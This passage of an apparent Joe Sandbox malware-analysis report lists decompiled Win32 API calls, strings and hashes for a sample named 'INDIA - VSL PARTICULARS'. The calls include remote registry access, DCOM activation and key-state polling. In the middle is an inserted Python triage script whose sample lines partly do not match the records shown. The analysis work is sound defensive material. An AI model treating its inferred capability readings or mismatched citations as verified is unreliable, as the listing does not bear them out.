                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                              • _wcslen.LIBCMT ref: 0046CDB0
                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                              • CoTaskMemFree.OLE32(?), ref: 0046CE42
                              • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                              Strings
                              • NULL Pointer assignment, xrefs: 0046CEA6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                              • String ID: NULL Pointer assignment
                              • API String ID: 440038798-2785691316
                              • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                              • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                              • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                              • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                              APIs
                              • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                              • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                              • _wcslen.LIBCMT ref: 004610A3
                              • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                              • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                              • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                              • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                              • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                              • GetWindowRect.USER32(?,?), ref: 00461248
                                • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                              • String ID: ThumbnailClass
                              • API String ID: 4136854206-1241985126
                              • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                              • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                              • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                              • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                              APIs
                              • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                              • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                              • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                              • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                              • GetClientRect.USER32(?,?), ref: 00471A1A
                              • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                              • DestroyIcon.USER32(?), ref: 00471AF4
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                              • String ID: 2
                              • API String ID: 1331449709-450215437
                              • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                              • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                              • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                              • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                              APIs
                              • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                              • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                              • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                              • __swprintf.LIBCMT ref: 00460915
                              • __swprintf.LIBCMT ref: 0046092D
                              • _wprintf.LIBCMT ref: 004609E1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                              • API String ID: 3054410614-2561132961
                              • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                              • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                              • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                              • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                              APIs
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                              • CLSIDFromString.OLE32(?,?), ref: 004587B3
                              • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                              • RegCloseKey.ADVAPI32(?), ref: 004587C5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                              • API String ID: 600699880-22481851
                              • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                              • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                              • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                              • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
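                               The keyboard-state routine listed earlier (GetAsyncKeyState/GetKeyState on 000000A0, 000000A1, 00000011, 00000012 and 0000005B) and the WNetAddConnection2W/RegConnectRegistryW routine just above are easier to triage once the raw hex arguments are resolved. The following is an added example, not code from the Joe Sandbox report or its IDA plugin: it parses call lines in the report's own "• Api.DLL(args), ref: ADDR" format, resolves the arguments whose meaning is fixed by the Win32 headers (virtual-key codes, predefined registry roots, KEY_* access masks, CLSCTX flags), and emits capability hints. The sample input is copied from the function records on this page; the constant tables, function names and flag wording are this example's own. Two caveats it encodes: the five key codes polled are all modifier keys (Shift, Ctrl, Alt, Win), so that routine reads modifier state and is not by itself keystroke capture; and the registry routine opens HKEY_LOCAL_MACHINE read-only (00020019 is KEY_READ) on a remote machine after a network connection, which together with the \IPC$ and SOFTWARE\Classes\...\CLSID strings is consistent with resolving a ProgID to a CLSID remotely (an interpretation, not something the report states).

```python
"""Decode Joe Sandbox "APIs" call lines into capability hints.

Added example (not part of the Joe Sandbox report or its IDA plugin).
Input lines have the shape "• Api.DLL(arg,arg,...), ref: ADDR"; arguments
are 32-bit hex, "?" when the plugin could not recover a value, and may be
negative (e.g. -000000FB). Constant tables are standard Win32 values from
winuser.h, winreg.h and wtypesbase.h.
"""
import re
from collections import Counter

CALL_RE = re.compile(
    r"•\s*(?P<api>\w+)\.(?P<dll>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Only the modifier keys this sample polls; extend for other samples.
VK_NAMES = {0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN",
            0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}
HKEY_NAMES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
              0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
KEY_ACCESS = {0x20019: "KEY_READ", 0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"}
CLSCTX = {0x1: "CLSCTX_INPROC_SERVER", 0x4: "CLSCTX_LOCAL_SERVER", 0x10: "CLSCTX_REMOTE_SERVER"}

# Constructed input: lines copied from several function records in the report.
SAMPLE = """
• GetKeyboardState.USER32(?), ref: 00453CE0
• GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
• GetKeyState.USER32(000000A0), ref: 00453D75
• GetAsyncKeyState.USER32(00000011), ref: 00453DE1
• GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
• CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
"""


def parse_calls(text):
    """Return one dict per call line; LIBCMT lines without an argument list are skipped."""
    calls = []
    for m in CALL_RE.finditer(text):
        args = []
        for a in m["args"].split(","):
            a = a.strip()
            args.append(None if a in ("", "?") else int(a, 16))  # int() accepts "-000000FB"
        calls.append({"api": m["api"], "dll": m["dll"], "args": args, "ref": int(m["ref"], 16)})
    return calls


def _arg(call, i):
    """Argument i, or None when absent or unrecovered ("?")."""
    return call["args"][i] if len(call["args"]) > i else None


def describe(call):
    """Render a call with constants of fixed Win32 meaning resolved to their names."""
    api = call["api"]
    if api in ("GetAsyncKeyState", "GetKeyState") and _arg(call, 0) is not None:
        vk = _arg(call, 0)
        return f"{api}({VK_NAMES.get(vk, hex(vk))})"
    if api == "RegConnectRegistryW" and _arg(call, 1) is not None:
        root = _arg(call, 1)
        return f"{api}(remote machine, {HKEY_NAMES.get(root, hex(root))})"
    if api == "RegOpenKeyExW" and _arg(call, 3) is not None:
        acc = _arg(call, 3)
        return f"{api}(..., {KEY_ACCESS.get(acc, hex(acc))})"
    if api == "CoCreateInstanceEx" and _arg(call, 2) is not None:
        ctx = _arg(call, 2)
        return f"{api}(..., {'|'.join(n for bit, n in CLSCTX.items() if ctx & bit)})"
    return api


def capability_flags(calls):
    """Capability hints a triager would note, including the modifier-only caveat."""
    flags = set()
    apis = Counter(c["api"] for c in calls)
    polled = {_arg(c, 0) for c in calls
              if c["api"] in ("GetAsyncKeyState", "GetKeyState") and _arg(c, 0) is not None}
    if polled:
        if polled <= set(VK_NAMES):
            flags.add("modifier-key state check (Shift/Ctrl/Alt/Win only; not keystroke capture by itself)")
        else:
            flags.add("keystroke polling on non-modifier keys (keylogger candidate)")
    if apis["WNetAddConnection2W"] and apis["RegConnectRegistryW"]:
        flags.add("remote registry access after a network (IPC$) connection")
    if any(c["api"] == "CoCreateInstanceEx" and _arg(c, 2) is not None and _arg(c, 2) & 0x10
           for c in calls):
        flags.add("COM activation permitting CLSCTX_REMOTE_SERVER (DCOM)")
    return sorted(flags)


if __name__ == "__main__":
    parsed = parse_calls(SAMPLE)
    for c in parsed:
        print(f"{c['ref']:08X}  {describe(c)}")
    for f in capability_flags(parsed):
        print("flag:", f)
```

                               Run it directly to print the decoded calls and the flags for the sample; paste any other "APIs" section from the report into SAMPLE to decode it the same way. Arguments the plugin prints as "?" stay unresolved, so a constant is only named when the disassembler actually recovered an immediate.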
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: DestroyWindow
                              • String ID: static
                              • API String ID: 3375834691-2160076837
                              • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                              • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                              • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                              • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                              • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ErrorMode$DriveType
                              • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                              • API String ID: 2907320926-3566645568
                              APIs
                                • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                              • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                              • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                              • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                              • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                              • DeleteObject.GDI32(00730000), ref: 00470A04
                              • DestroyIcon.USER32(00720065), ref: 00470A1C
                              • DeleteObject.GDI32(2E20EE42), ref: 00470A34
                              • DestroyWindow.USER32(00000073), ref: 00470A4C
                              • DestroyIcon.USER32(?), ref: 00470A73
                              • DestroyIcon.USER32(?), ref: 00470A81
                              • KillTimer.USER32(00000000,00000000), ref: 00470B00
                              Similarity
                              • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                              • String ID:
                              • API String ID: 1237572874-0
                              APIs
                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                              • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                              • VariantInit.OLEAUT32(?), ref: 004793E1
                              • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                              • VariantCopy.OLEAUT32(?,?), ref: 00479461
                              • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                              • VariantClear.OLEAUT32(?), ref: 00479489
                              • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                              • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                              • VariantClear.OLEAUT32(?), ref: 004794CA
                              • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                              Similarity
                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                              • String ID:
                              • API String ID: 2706829360-0
                              APIs
                              • GetKeyboardState.USER32(?), ref: 0044480E
                              • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                              • GetKeyState.USER32(000000A0), ref: 004448AA
                              • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                              • GetKeyState.USER32(000000A1), ref: 004448D9
                              • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                              • GetKeyState.USER32(00000011), ref: 00444903
                              • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                              • GetKeyState.USER32(00000012), ref: 0044492D
                              • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                              • GetKeyState.USER32(0000005B), ref: 00444958
                              Similarity
                              • API ID: State$Async$Keyboard
                              • String ID:
                              • API String ID: 541375521-0
                              APIs
                              Similarity
                              • API ID: InitVariant$_malloc_wcscpy_wcslen
                              • String ID:
                              • API String ID: 3413494760-0
                              APIs
                              Strings
                              Similarity
                              • API ID: AddressProc_free_malloc$_strcat_strlen
                              • String ID: AU3_FreeVar
                              • API String ID: 2634073740-771828931
                              APIs
                              • CoInitialize.OLE32 ref: 0046C63A
                              • CoUninitialize.OLE32 ref: 0046C645
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                              • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                              • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                              • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                              • IIDFromString.OLE32(?,?), ref: 0046C705
                              Strings
                              Similarity
                              • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                              • API String ID: 2294789929-1287834457
                              APIs
                                • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                              • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                              • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                              • ImageList_EndDrag.COMCTL32 ref: 00471169
                              • ReleaseCapture.USER32 ref: 0047116F
                              • SetWindowTextW.USER32(?,00000000), ref: 00471206
                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                              Strings
                              Similarity
                              • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                              • String ID: @GUI_DRAGFILE$@GUI_DROPID
                              • API String ID: 2483343779-2107944366
                              APIs
                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                              • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                              • _wcslen.LIBCMT ref: 00450720
                              • _wcscat.LIBCMT ref: 00450733
                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                              • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                              Strings
                              Similarity
                              • API ID: MessageSend$Window_wcscat_wcslen
                              • String ID: -----$SysListView32
                              • API String ID: 4008455318-3975388722
                              APIs
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                              • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                              • GetParent.USER32 ref: 00469C98
                              • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                              • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                              • GetParent.USER32 ref: 00469CBC
                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                              Strings
                              Similarity
                              • API ID: MessageSend$CtrlParent$_memmove_wcslen
                              • String ID: ComboBox$ListBox
                              • API String ID: 2360848162-1403004172
                              APIs
                              Similarity
                              • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                              • String ID:
                              • API String ID: 262282135-0
                              APIs
                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                              • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                              • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                              • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                              • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                              • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                              • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                              Similarity
                              • API ID: MessageSend$LongWindow
                              • String ID:
                              • API String ID: 312131281-0
                              APIs
                                • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                              • SendMessageW.USER32(769523D0,00001001,00000000,?), ref: 00448E16
                              • SendMessageW.USER32(769523D0,00001026,00000000,?), ref: 00448E25
                                • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: MessageSend$BrushCreateDeleteObjectSolid
                              • String ID:
                              • API String ID: 3771399671-0
                              • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                              • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                              • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                              • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                              APIs
                              • GetCurrentThreadId.KERNEL32 ref: 00434643
                              • GetForegroundWindow.USER32(00000000), ref: 00434655
                              • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                              • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                              Similarity
                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                              • String ID:
                              • API String ID: 2156557900-0
                              • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
